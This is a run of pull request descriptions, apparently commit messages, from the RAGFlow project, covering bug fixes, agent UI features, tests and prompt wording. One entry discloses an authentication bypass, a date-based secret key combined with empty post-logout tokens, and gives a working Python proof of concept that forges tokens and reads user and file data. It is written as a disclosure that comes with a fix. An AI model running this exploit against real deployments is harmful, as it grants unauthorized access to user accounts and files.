### What problem does this PR solve?
Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases
Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.
In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and others should be left in the
queue for other `task_executors` or be picked after 1 of the spots in
the current executor gets free. This PR ensures this behavior.
The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
now Streamning logic is not match with none streaming logic, which may
introduce down stream can not find upstream components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys
def exploit_ragflow(target):
# Generate token with predictable key
daily_key = str(date.today())
serializer = URLSafeTimedSerializer(secret_key=daily_key)
malicious_token = serializer.dumps("")
print(f"Target: {target}")
print(f"Secret key: {daily_key}")
print(f"Generated token: {malicious_token}\n")
# Test endpoints
endpoints = [
("/v1/user/info", "User profile"),
("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
]
auth_headers = {"Authorization": malicious_token}
for path, description in endpoints:
print(f"Testing {description}...")
response = requests.get(f"{target}{path}", headers=auth_headers)
if response.status_code == 200:
data = response.json()
if data.get("code") == 0:
print(f"SUCCESS {description} accessible")
if "user" in path:
user_data = data.get("data", {})
print(f" Email: {user_data.get('email')}")
print(f" User ID: {user_data.get('id')}")
elif "file" in path:
files = data.get("data", {}).get("files", [])
print(f" Files found: {len(files)}")
else:
print(f"Access denied")
else:
print(f"HTTP {response.status_code}")
print()
if __name__ == "__main__":
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category should work well, but the category's downstream seems to be
unable to get the upstream output.
Add the category's output as an attribute.
However, in base.py, there is logic
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
If goto this cases will not tried to get output from Category (but I do
not have full context about this if logic).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
sync test group from sdk/python/pyproject.toml to top pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)